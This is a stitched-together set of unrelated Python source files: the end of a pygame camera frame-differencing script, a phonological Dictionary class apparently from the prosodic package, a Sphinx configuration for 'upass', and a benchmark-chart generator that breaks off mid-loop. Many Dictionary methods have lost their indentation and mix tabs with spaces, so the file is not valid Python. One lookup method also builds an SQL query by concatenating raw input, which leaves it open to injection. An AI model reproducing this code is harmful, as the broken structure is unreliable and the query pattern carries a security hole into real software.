        mask_d_pic[maskr2] = [0, 0, 0]
        mask_d_pic[maskg2] = [0, 0, 0]
        mask_d_pic[maskb2] = [0, 0, 0]
        #e_pic = e_pic/6 + old_e
        e_pic = [200, 200, 0]  # NOTE(review): dead store, overwritten below
        #e_pic = e_pic/2 - ((mask_d_pic) + (mask_b_pic))
        #e_pic = e_pic/2 + ((mask_d_pic) + (mask_b_pic))
        #choose one of the following
        #e_pic = mask_d_pic #shows when pixel is darker than it was
        #e_pic = mask_b_pic #shows when pixel is lighter than prior
        e_pic = mask_d_pic - mask_b_pic #black execpt for movement
        e_pic = mask_b_pic / (mask_d_pic / 100) #black execpt for movement
        #e_pic = mask_d_pic + mask_b_pic #looks odd
        Image.fromarray(e_pic).save(e_photo)
    #plt.imshow(lol)
    #plt.show()
    #Image.fromarray(numpy_pic).save(e_photo)
    # Show the processed frame.
    onscreen = pygame.image.load(e_photo)
    gameDisplay.blit(onscreen, (0,0))
    pygame.display.update()
    if trig == True:
        print("Waiting for input before taking next image...")
        tp = raw_input("press return to take picture; ")
        if tp == "q":
            print("---bye!")
            exit()
        clock.tick(20)
    if loop == True:
        pygame.time.wait(num)
        clock.tick(20)
    elif trig == False and loop == False:
        # Neither looped nor triggered: single-shot run.
        crashed = True
    #while True:
    #pygame.time.wait(1000)
    #clock.tick(20)
pygame.quit()
quit()
|
# -*- coding: UTF-8 -*-
import os,pickle,glob,time,sys
from tools import *
from entity import *
from Word import Word
from Syllable import Syllable
from ipa import ipa
import codecs
class Dictionary: # cf Word, in that Text.py will really instantiate Dictionary_en,Dictionary_fi,usw.
    """Language dictionary: maps tokens to phonological Word objects, with one
    cache table per entity class (see classnames)."""
    # Entity class names that each get one lookup table in self.dict.
    classnames=['Phoneme','Onset','Nucleus','Coda','Rime','SyllableBody','Syllable','Word','Phrase']
    # Trailing characters of multi-character IPA symbols; used by ipa2phons to
    # glue two-character phonemes together.
    char2phons=[]
    for k in ipa.keys():
        if len(k)>1:
            for x in k[1:]:
                char2phons.append(x)
    def __init__(self,lang):
        """Locate the language's dict folder, load un/maybe-stressed word lists,
        and boot the dictionary either from ZODB (when persisting) or memory."""
        import prosodic
        dirself=prosodic.dir_prosodic
        libfolder=os.path.join(dirself,'lib')
        dictsfolder=os.path.join(dirself,'dicts')
        self.config=prosodic.config
        self.lang = lang                                         # two-letter language code, e.g. "en"
        self.libfolder = libfolder
        self.dictsfolder = os.path.join(dictsfolder,self.lang)
        sys.path.append(self.dictsfolder)
        self.language=""
        self.getprep=False                                       # optional python loader (see below)
        self.booted=False
        # Language name = stem of the first file starting with the lang code.
        for filename in glob.glob(os.path.join(self.dictsfolder, self.lang+'*')):
            self.language = filename.split(os.path.sep).pop().split(".")[0]
            break
        if not self.language:
            exit('!! language could not be ascertained from files in '+self.dictsfolder+'. Please name your .tsv and/or .py dictionary file(s) using a string which begins with the two characters which serve as the name for the dictionary folder (eg, "en")')
        # Whitespace-separated word lists of always-/possibly-unstressed words.
        self.unstressedWords=[]
        for filename in glob.glob(os.path.join(self.dictsfolder, 'unstressed*')):
            file=codecs.open(filename,encoding='utf-8')
            for ln in file:
                for word in ln.split():
                    self.unstressedWords.append(word)
            file.close()
            break
        self.maybestressedWords=[]
        for filename in glob.glob(os.path.join(self.dictsfolder, 'maybestressed*')):
            file=codecs.open(filename,encoding='utf-8')
            for ln in file:
                for word in ln.split():
                    self.maybestressedWords.append(word)
            file.close()
            break
        # A <language>.py module may provide a get() used instead of the tsv.
        pyfile=os.path.join(self.dictsfolder,self.language+'.py')
        if os.path.exists(pyfile):
            self.getprep=get_class(self.language+'.get')
        self.cachefolder=os.path.join(self.dictsfolder,'_cache')
        self.dictentries=None
        build=False
        ## language objects
        timestart=time.clock()
        if being.persists:
            # ZODB-backed persistent dictionary.
            if __name__=='__main__':
                print "## booting ontology: " + self.language + " ..."
            if not os.path.exists(self.cachefolder):os.mkdir(self.cachefolder)
            self.storage = FileStorage(self.cachefolder+'ontology.zodb')
            self.db = DB(self.storage)
            self.conn = self.db.open()
            self.dict = self.conn.root()
            self.t=transaction
            if not len(self.dict.values()):
                build=True
        else:
            # Plain in-memory dictionary.
            self.dict={}
            self.refresh()
            topickle=self.exists_pickle()
            topickle=False   # NOTE(review): pickle booting is deliberately disabled here
            if topickle:
                self.boot_pickle(topickle)
            else:
                build=True
        if build:
            self.refresh()
            self.boot()
        if __name__=='__main__':
            print self.stats(prefix="\t").replace("[[time]]",str(round((time.clock() - timestart),2)))
    def boot(self): ## NEEDS EXTENSION
        """Load the language's .tsv word list; exit if no data source exists.

        NOTE(review): when a .py loader is present (self.getprep), booted is
        never set here and this exits with a misleading message -- presumably
        boot() is only reached for tsv-backed languages; verify.
        """
        if not self.getprep:
            bootfile=os.path.join(self.dictsfolder,self.language+'.tsv')
            if os.path.exists(bootfile):
                self.boot_general(bootfile)
                self.booted=True
        if not self.booted:
            exit("<error:dictionary> neither a "+self.language+".tsv nor a "+self.language+".py in directory "+self.dictsfolder)
    def str2unicode(self,string):
        """Best-effort conversion of a byte string to unicode (Python 2 only)."""
        o=u""
        for x in string:
            try:
                o+=unicode(x)
            except UnicodeDecodeError:
                # Fall back to mapping the raw byte value to a code point.
                print "error"
                o+=unichr(ord(x))
        return o
    def boot_general(self,bootfile):
        """Populate self.dict['Word'] from a tab-separated token/stressed-ipa file.

        Each entry is stored as a raw (stressedipa, sylls_text) tuple; Word
        objects are built lazily by get()/make().
        """
        if __name__=='__main__':
            print "## booting dictionary: " + self.language + " ..."
        # NOTE(review): file handle is never closed here.
        file=codecs.open(bootfile,encoding='utf-8')
        for ln in file:
            line=ln.split('\t')
            line.reverse()
            token=line.pop().strip()
            if token.startswith('#'): continue
            stressedipa=line.pop().strip()
            # When the token carries syllable dots matching the IPA's count,
            # keep the syllabified spelling and strip the dots from the token.
            if ("." in token) and (token.count(".")==stressedipa.count(".")):
                sylls_text=token.split(".")
                token=token.replace(".","")
            else:
                sylls_text=None
            #line.reverse()
            #otherfeats=line
            if (not token in self.dict['Word']):
                self.dict['Word'][token]=[]
            self.dict['Word'][token].append((stressedipa,sylls_text))
    def build(self): ## NEEDS EXTENSION
        # Hook for language-specific subclasses to build their data; no-op here.
        pass
    def refresh(self):
        """(Re)create one empty lookup table per entity class in self.dict."""
        if being.persists:
            # ZODB-backed: clear the root mapping and use persistent BTrees.
            self.dict.clear()
            for k in Dictionary.classnames:
                self.dict[k]=OOBTree()
        else:
            for k in Dictionary.classnames:
                self.dict[k]={}
# boot options
    def exists_pickle(self,picklefile=False):
        """Return the pickle path if it exists on disk, else False.

        NOTE(review): the default path is built by plain concatenation
        (dictsfolder + language + '.pickle', no path separator), matching
        save_pickle's convention -- confirm this is the intended location.
        """
        if not picklefile:
            picklefile=self.dictsfolder+self.language+'.pickle'
        if not os.path.exists(picklefile):
            return False
        else:
            return picklefile
    def boot_pickle(self,picklefile):
        """Replace self.dict with the unpickled contents of *picklefile*."""
        # NOTE(review): opened in text mode; fine under Python 2, would need
        # 'rb' under Python 3.
        file=open(picklefile)
        self.dict=pickle.load(file)
        file.close()
    def boot_dict(self,filename): # filename = *.txt or *.pickle
        """Load a legacy whitespace-separated .txt dictionary into self.dictentries."""
        print ">> loading Dictionary " + filename + "..."
        fileobj = open(self.dictsfolder + filename, 'r')
        if filename[-7:] == ".pickle":
            return None # the bare-bones text file [language].tsv should not be pickled--wasteful
        elif filename[-4:] == ".txt":
            dictionary = {}
            # NOTE(review): this first line is discarded -- the loop re-reads
            # immediately at its top, so line 1 of the file is never parsed.
            curLine = fileobj.readline().strip()
            while(curLine):
                curLine = fileobj.readline().strip()
                if(curLine == ""): break
                if(curLine.startswith("#")): continue
                tokens = curLine.split()
                if(len(tokens) < 2): continue
                curKey = tokens[0].lower()
                # Strip variant markers like "word(2)" down to "word".
                if("(" in curKey):
                    wrd = curKey.split("(")[0].strip()
                else:
                    wrd = curKey.strip()
                if(not wrd in dictionary):
                    dictionary[wrd] = []
                dictionary[wrd].append(curLine)
            self.dictentries=dictionary
        else:
            self.dictentries={}
# boot_dict_specific
def boot_dict_specific(self,filename,sep="\t"):
newdict={}
if (not "/" in filename):
filename=self.dictsfolder+filename
file=open(filename,'r')
for line in file:
linedat=line.split(sep)
key=linedat[0]
val=linedat[1]
if key.startswith('#'): continue
if (not key in newdict):
newdict[key]=val
else:
if type(newdict[key])==list:
newdict[key].append(val)
else:
newdict[key]=[newdict[key],val]
return newdict
    def boot_build(self):
        # NOTE(review): Dictionary.build() takes no 'save' argument, so this
        # raises TypeError unless a language subclass overrides build(save=...)
        # -- presumably subclasses do; verify before relying on this.
        self.build(save=False)
# lookup options
def lookup_db(self,tok): # needs to be rewritten
rows=[]
for row in self.c.execute('select entry from dict where lower(word)="' + tok.lower() + '"'):
for x in row:
if (not x in rows):
rows.append(x)
return rows
def lookup_dict(self,tok):
if (not tok in self.dict):
return {}
else:
return self.dictentries[tok]
    def gleanPunc(self,word):
        # Thin wrapper around the module-level gleanPunc (from tools import *).
        return gleanPunc(word)
    def has(self,word):
        """True if the (punctuation-stripped, lowercased) word has entries in
        the Word table."""
        if not word: return False
        word=unicode(word)
        (p0,word,p1)=gleanPunc2(word)
        word_l = word.lower()
        ## if not there, but a contractino
        # if already there, say yes
        if word_l in self.dict['Word'] and self.dict['Word'][word_l]: return True
        # The block below is disabled (a bare string statement): it synthesised
        # entries for 's / 'd contractions from the uncontracted form.
        """
        for contr,add_ipa in [("'s","z"), ("'d","d")]:
            if word_l.endswith(contr):
                word_l_unc = word_l[:-2]
                # if the uncontracted in the dictionary
                if word_l_unc in self.dict['Word'] and self.dict['Word'][word_l_unc]:
                    for obj in self.dict['Word'][word_l_unc]:
                        if type(obj) in [tuple]:
                            ipa,sylls_text=obj
                        else:
                            ipa=obj.ipa
                            sylls_text=obj.sylls_text
                        ipa+=add_ipa
                        #sylls_text[-1]+=contr
                        ## save new word
                        if not word_l in self.dict['Word']: self.dict['Word'][word_l]=[]
                        self.dict['Word'][word_l]+=[(ipa,sylls_text)]
        """
        return (word_l in self.dict['Word'] and self.dict['Word'][word_l])
    def use(self,classtype,key):
        """
        Return (creating and caching on demand) the entity object of
        *classtype* for *key*; list keys are normalised to tuples.

        HACKED 9/29/16: No longer caching SyllableBodies. Reuse was causing bugs. More thorough solution would be helpful.
        """
        if type(key)==type([]):
            key=tuple(key)
        if (not key in self.dict[classtype]):
            if classtype in ['Phoneme','Onset','Nucleus','Coda','Rime','Syllable']:
                self.dict[classtype][key]=get_class(classtype+'.'+classtype)(key,self.lang)
                #return get_class(classtype+'.'+classtype)(key,self.lang)
            elif classtype=="SyllableBody":
                # Built fresh every call, never cached (see HACK note above).
                #self.dict[classtype][key]=self.syllphon2syll(key,self.lang)
                return self.syllphon2syll(key,self.lang)
        return self.dict[classtype][key]
def haveAlready(self,classtype,key):
if type(key)==type([]):
key=tuple(key)
return (key in self.dict[classtype])
    def ipa2phons(self,stressedipa):
        """Convert a stress-marked IPA string into a list of phoneme tuples,
        one tuple per '.'-separated syllable. Two-character IPA symbols are
        glued together via char2phons, and adjacent vowels are merged into a
        single diphthong Phoneme."""
        sylls=[]
        for syllphon in stressedipa.split("."):
            syll=[]
            syllphon.strip()  # NOTE(review): no-op -- the stripped result is discarded
            for i in range(len(syllphon)):
                phon=syllphon[i]
                # Skip continuation characters and stress marks themselves.
                if (phon in Dictionary.char2phons): continue
                if (phon=="`") or (phon=="'"): continue
                try:
                    phonN=syllphon[i+1]
                except IndexError:
                    phonN=False
                # Join a two-character symbol (e.g. affricate/long vowel).
                if phonN and (phonN in Dictionary.char2phons):
                    phon=phon+phonN
                phonobj=self.use('Phoneme',phon)
                syll.append(phonobj)
            # Merge the first pair of adjacent vowels into one diphthong.
            Vwaslast=False
            k=-1
            for phon in syll:
                k+=1
                if phon.isVowel():
                    if Vwaslast:
                        if self.haveAlready('Phoneme', (Vwaslast.phon,phon.phon)):
                            newphon=self.use('Phoneme',(Vwaslast.phon,phon.phon))
                        else:
                            newphon=get_class('Phoneme.Phoneme')([self.use('Phoneme',x) for x in [Vwaslast.phon,phon.phon]], self.lang)
                            #self.dict['Phoneme'][(Vwaslast.phon,phon.phon)]=newphon
                            self.dict['Phoneme'][Vwaslast.phon+phon.phon]=newphon
                        syll[k]=newphon
                        syll.remove(Vwaslast)
                        break
                    else:
                        Vwaslast=phon
            sylls.append(tuple(syll))
        return sylls
    def syllphon2syll(self,syllphon,lang):
        """Build a SyllableBody from a phoneme sequence: consonants before the
        first vowel form the onset, vowels the nucleus, the rest the coda."""
        onset=[]
        nucleus=[]
        coda=[]
        for x in syllphon:
            if x.isVowel():
                nucleus.append(x)
            else:
                if not nucleus:
                    onset.append(x)
                else:
                    coda.append(x)
        return get_class('SyllableBody.SyllableBody')(self.use('Onset',onset),self.use('Rime', (self.use('Nucleus',nucleus),self.use('Coda',coda))), lang)
def stressedipa2stress(self,stressedipa):
o=""
for x in stressedipa.split("."):
if "'" in x:
o+="P"
elif "`" in x:
o+="S"
else:
o+="U"
return o
    def getStrengthStress(self,stress):
        """Convert a stress string ('P'/'S'/'U' per syllable) into parallel
        lists: stress values (1.0/0.5/0.0) and relative strengths (1.0 if
        stronger than a neighbour, 0.0 if weaker, None if undecidable)."""
        prom_stress=[]
        prom_strength=[]
        for x in stress:
            if x=='P': prom_stress+=[1.0]
            elif x=='S': prom_stress+=[0.5]
            elif x=='U': prom_stress+=[0.0]
        # Strength compares each syllable with its neighbours; the following
        # syllable takes precedence over the preceding one.
        for i,x in enumerate(prom_stress):
            prevx=prom_stress[i-1] if i-1>=0 else None
            nextx=prom_stress[i+1] if i+1<len(prom_stress) else None
            #print i,prevx,x,nextx
            if nextx!=None and nextx>x:
                strength=0.0
            elif nextx!=None and nextx<x:
                strength=1.0
            elif prevx!=None and prevx>x:
                strength=0.0
            elif prevx!=None and prevx<x:
                strength=1.0
            else:
                strength=None
            #print i,prevx,x,nextx
            prom_strength+=[strength]
        return (prom_stress,prom_strength)
    def getStrengthStress0(self,stress):
        """Legacy predecessor of getStrengthStress (kept, apparently unused):
        same contract, computed case-by-case per stress letter.

        NOTE(review): for len(stress)>1 this appends no strength when a letter
        is not in {P,S,U}, so the two lists can fall out of step -- one reason
        it was presumably superseded; confirm before reuse.
        """
        prom_strength=[]
        prom_stress=[]
        for i in range(len(stress)):
            syll=stress[i]
            # Previous/next letters, False at the edges. Note stress[i-1] at
            # i==0 wraps to the last letter rather than raising IndexError.
            syllP=False
            syllN=False
            try:
                syllP=stress[i-1]
            except IndexError:
                pass
            try:
                syllN=stress[i+1]
            except IndexError:
                pass
            if syll=="P":
                prom_stress.append(1.0)
                if (len(stress)>1):
                    if syllN and (syllN=="P"):
                        prom_strength.append(None)
                    elif syllP and (syllP=="P"):
                        if len(stress)>2:
                            prom_strength.append(1.0)
                        else:
                            prom_strength.append(None)
                    else:
                        prom_strength.append(1.0)
            elif syll=="S":
                prom_stress.append(0.5)
                if (len(stress)>1):
                    if syllP and ((syllP=="P") or (syllP=="S")):
                        prom_strength.append(0.5)
                    elif syllN and (syllN=="P"):
                        prom_strength.append(0.5)
                    else:
                        prom_strength.append(0.5)
            elif syll=="U":
                prom_stress.append(0.0)
                if (len(stress)>1):
                    if syllP and ((syllP=="P") or (syllP=="S")):
                        prom_strength.append(0.0)
                    elif syllN and ((syllN=="P") or (syllN=="S")):
                        prom_strength.append(0.0)
                    else:
                        prom_strength.append(None)
        if len(stress)==1:
            prom_strength=[None]
        return (prom_stress,prom_strength)
    def reset(self):
        """Drop all cached entity tables and demote built Word objects back to
        raw (ipa, sylls_text) tuples so they can be rebuilt lazily."""
        for classtype in [ct for ct in self.dict if ct!='Word']: self.dict[classtype]={}
        for word in self.dict['Word']:
            self.dict['Word'][word]=[((wordobj.ipa,wordobj.sylls_text) if type(wordobj)!=tuple else wordobj) for wordobj in self.dict['Word'][word]]
    def make(self,stressedipasylls_text,token):
        """Build a Word object for *token* from a (stressed-ipa, sylls_text) pair:
        derive the stress profile, prominence values and syllable objects."""
        stressedipa=stressedipasylls_text[0]
        sylls_text=stressedipasylls_text[1]
        stress=self.stressedipa2stress(stressedipa)
        (prom_stress,prom_strength)=self.getStrengthStress(stress)
        syllphons=self.ipa2phons(stressedipa)
        sylls=[]
        for i in range(len(syllphons)):
            syllbody=self.use('SyllableBody',syllphons[i])
            syll=self.use('Syllable',(syllbody,prom_strength[i],prom_stress[i]))
            #print token,i,syllbody,syll,syllphons,stressedipa,stress,prom_stress,prom_strength
            sylls.append(syll)
        word=Word(token,sylls,sylls_text)
        word.ipa=stressedipa
        word.stress=stress
        word.lang=self.lang
        return word
    def maybeUnstress(self,words):
        """Resolve stress ambiguity for function words: for words on the
        maybestressed list, ensure both a stressed and an unstressed variant
        exist; for words on the unstressed list, force the unstressed form.
        Other words pass through unchanged."""
        word=words[0].token.lower()
        def unstress_word(wordobj):
            # Mark as function word and zero out stress/prominence features.
            #wordobj.feat('functionword',True)
            wordobj.feats['functionword']=True
            wordobj.stress=""
            for child in wordobj.children:
                wordobj.stress+="U"
                child.feats['prom.stress']=0.0
                child.feats['prom.kalevala']=None
                child.children[0].feats['prom.weight']=False
        if word in self.maybestressedWords: # only for monosyllabs
            wordobjs=self.dict['Word'][word]
            stresses = [wordobj.stress for wordobj in wordobjs]
            if max([len(sx) for sx in stresses])>1:
                return wordobjs
            if 'U' in stresses and 'P' in stresses:
                # Both variants exist already; just mark the unstressed ones.
                unstressed_words = [wordobj for wordobj in wordobjs if wordobj.stress=='U']
                for wordobj in unstressed_words: unstress_word(wordobj)
                return wordobjs
            else:
                # Synthesise the missing variant by adding/removing the
                # primary-stress mark on the IPA.
                wordobj1=wordobjs[0]
                ipa=wordobj1.ipa
                if 'U' in stresses and not 'P' in stresses:
                    newipa="'"+ipa
                    newobjs=[self.make((_ipa,None),word) for _ipa in [ipa,newipa]]
                    #newobjs[0].feat('functionword',True)
                    newobjs[0].feats['functionword']=True
                elif 'P' in stresses and not 'U' in stresses:
                    newipa=ipa[1:]
                    newobjs=[self.make((_ipa,None),word) for _ipa in [ipa,newipa]]
                    #newobjs[-1].feat('functionword',True)
                    newobjs[-1].feats['functionword']=True
                else:
                    # NOTE(review): neither U nor P present (e.g. only 'S');
                    # newobjs is unbound here and the return below would raise
                    # NameError -- presumably unreachable in practice; verify.
                    print "??",word,stresses
                return newobjs
        elif word in self.unstressedWords:
            wordobj=self.dict['Word'][word][0]
            unstress_word(wordobj)
            return [wordobj]
        return words
    def get(self,word,stress_ambiguity=True):
        """Return the list of Word objects for *word*, building (and caching)
        them from raw tuples on first access. Unknown words yield a single
        empty Word. With stress_ambiguity, function-word stress variants are
        resolved via maybeUnstress."""
        if type(word)==str:
            # Python 2: promote byte strings to unicode before lookup.
            word=word.decode('utf-8',errors='ignore')
        (word,punct)=gleanPunc(word)
        if self.has(word):
            words=self.dict['Word'][word.lower()]
        elif self.getprep:
            # Language-specific loader (from <language>.py) as fallback.
            words=self.getprep(word,config=self.config)
        else:
            return [Word(word,[],None)]
        if not words:
            return [Word(word,[],None)]
        if type(words)==list:
            if type(words[0])==tuple: # New word needs to be built
                wordobjs=[]
                for wordtuple in words:
                    # Optional third tuple element: extra attributes to set.
                    wrd=wordtuple[:2]
                    attrs=wordtuple[2] if len(wordtuple)>2 else {}
                    wordobj=self.make(wrd,word)
                    for _k,_v in attrs.items(): setattr(wordobj,_k,_v)
                    wordobjs+=[wordobj]
                # Cache the built objects in place of the raw tuples.
                self.dict['Word'][word.lower()]=wordobjs
                return self.maybeUnstress(wordobjs) if stress_ambiguity else wordobjs
            else:
                wordobjs=words
        else:
            wordobjs=[words]
        return self.maybeUnstress(wordobjs) if stress_ambiguity else wordobjs
## featpaths:experimental
	def featpath(self):
		"""Experimental stub (see '## featpaths' note above); does nothing yet."""
		pass
# save options
def save_tabbed(self):
for k,v in self.dict.items():
if k!='word': continue # just the words for now
o="token\tstress\tipa\n"
for kk,vv in v.items():
if type(vv)!=type([]):
vv=[vv]
for vvv in vv:
if not vvv: continue
o+=str(kk)+"\t"+str(vvv.str_ipasyllstress())+"\n"
file=open(self.dictsfolder+self.language+'.tsv','w')
file.write(o)
file.close()
def save_pickle(self):
file=open(self.dictsfolder+self.language+'.pickle','w')
pickle.dump(self.dict,file)
file.close()
def persist(self):
if being.persists:
self.t.commit()
	def save(self):
		"""Commit the persistence transaction (if enabled), then write the
		tab-separated dump via save_tabbed()."""
		if being.persists:
			print "saving..."
			self.t.commit()
			#transaction.commit()
		self.save_tabbed()
def words(self):
words=[]
for k,v in self.dict['word'].items():
for vv in v:
words.append(vv)
return words
def close(self):
if being.persists:
self.conn.close()
## output option
def stats(self,prefix="\t"):
#self.numents={}
o=""
for k,v in self.dict.items():
if not len(v): continue
if k[-2:]=="us":
ks=k[:-2]+"i"
else:
ks=k+'s'
o+=prefix + str(len(v)).replace('0','?') + ' ' + ks + '\n'
if o:
return "## [[[time]]s] loaded:\n"+o
else:
return ""
return o
|
# -*- coding: utf-8 -*-
#
# upass documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 14 21:02:58 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'upass'
copyright = u'2015-2021, Chris Warrick'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3.0'
# The full version, including alpha/beta/rc tags.
release = '0.3.0'
# NOTE(review): version/release are hard-coded here and must be bumped in
# lockstep with the package on every release — consider importing them.
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# NOTE(review): the 'default' theme was renamed 'classic' in Sphinx 1.3;
# on modern Sphinx this selects the new default ('alabaster') — confirm
# which look is intended.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
# Output file base name for HTML help builder.
htmlhelp_basename = 'upassdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'upass.tex', u'upass Documentation',
   u'Chris Warrick', 'manual'),
]
latex_elements = {'papersize': 'a4paper', 'fontpkg': '\\usepackage{tgheros}',
                  'fncychap': '\\usepackage[Sonny]{fncychap}'}
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'upass', u'upass Documentation',
     [u'Chris Warrick'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
# NOTE(review): this is the legacy unnamed-mapping form over http; newer
# Sphinx expects named mappings like {'python': ('https://docs.python.org/3', None)}.
intersphinx_mapping = {'http://docs.python.org/': None}
|
#!/usr/bin/python
import sys;
def sortedKeys(dict):
    """Return the keys of *dict* as a sorted list.

    Fix: the previous ``keys = dict.keys(); keys.sort()`` only works on
    Python 2 — on Python 3 ``keys()`` returns a view with no ``.sort()``.
    ``sorted()`` works on both and avoids the temporary.
    The parameter name shadows the builtin ``dict``; it is kept so any
    keyword call (``sortedKeys(dict=...)``) stays compatible.
    """
    return sorted(dict)
if __name__ == '__main__':
    # Reads a benchmark log (3 lines per run: header line, timing line, GC
    # line) named in argv[1] and emits <input>.js + <input>.html that render
    # Google Charts line graphs of throughput and GC pause time, one pair of
    # charts per thread count.
    i = 0
    width = 1200   # chart pixel dimensions
    height = 600
    reader = open(sys.argv[1], "r")
    jsname = '%s.js' % sys.argv[1]
    jswriter = open(jsname, "w")
    htmlwriter = open(sys.argv[1] + '.html', "w")
    charts = []    # div ids of every chart emitted, referenced by the HTML page
    colors = ["'#F00'", "'#080'", "'#00009c'", "'orange'", "'purple'", "'grey'", "'cyan'", "'black'"]
    name = ''
    threads = ''
    messages = ''
    loggerMap = {}     # sets (dicts with True values) of seen loggers /
    threadsMap = {}    # thread counts / message counts
    messagesMap = {}
    timeMap = {}       # "<logger>_<threads>_<messages>" -> list of run times
    gcMap = {}         # same key -> list of GC pause times (seconds)
    # Pass 1: parse the log; every 3 consecutive lines describe one run.
    for line in reader:
        #print i , " " , line
        line = line.strip()
        idx = i % 3
        a = line.split()
        if idx == 0 :
            # header line: "<logger> ... <threads> ... <messages>"
            name = a[0]
            threads = a[4]
            messages = a[6]
            loggerMap[name] = True
            threadsMap[int(threads)] = True
            messagesMap[int(messages)] = True
        elif idx == 1 :
            # timing line: 4th token is the elapsed time for the run
            time = float(a[3])
            key = name + '_' + threads + '_' + messages
            if key not in timeMap:
                timeMap[key] = []
            timeMap[key].append(time)
        elif idx == 2 :
            # GC line: blank means no GC pause recorded
            if len(line) == 0:
                gc = 0.0
            else :
                gc = float(line)
            key = name + '_' + threads + '_' + messages
            if key not in gcMap:
                gcMap[key] = []
            gcMap[key].append(gc)
        i = i + 1
    v = []
    v.append('threads')
    v.append('messages')
    for name in sortedKeys(loggerMap):
        v.append(name + " throughput")
        v.append(name + " gc")
    jswriter.write('function drawChart(){ \n')
    # NOTE(review): this loop builds v/v2 but never writes the result
    # anywhere — it is recomputed in the loop below. Looks like dead code
    # left from an earlier version; confirm before removing.
    for threads in sortedKeys(threadsMap):
        v = []
        v.append(str(threads))
        for messages in sortedKeys(messagesMap):
            v2 = list(v)
            v2.append(str(messages))
            for name in sortedKeys(loggerMap):
                key = name + '_' + str(threads) + '_' + str(messages)
                avg = sum(timeMap[key])/len(timeMap[key])
                v2.append('%.2f' % (float(messages) / avg))
                # into ms
                avg = sum(gcMap[key])/len(gcMap[key])
                v2.append('%.2f' % (1000 * avg))
    # Pass 2: one throughput chart + one GC chart per thread count.
    for threads in sortedKeys(threadsMap):
        t = str(threads)
        ts = str(threads)
        tname = "threads"
        if threads == 1:
            tname = "thread"
            ts = 'single'
        # throughput data rows: one row per message count, one column per logger
        v = []
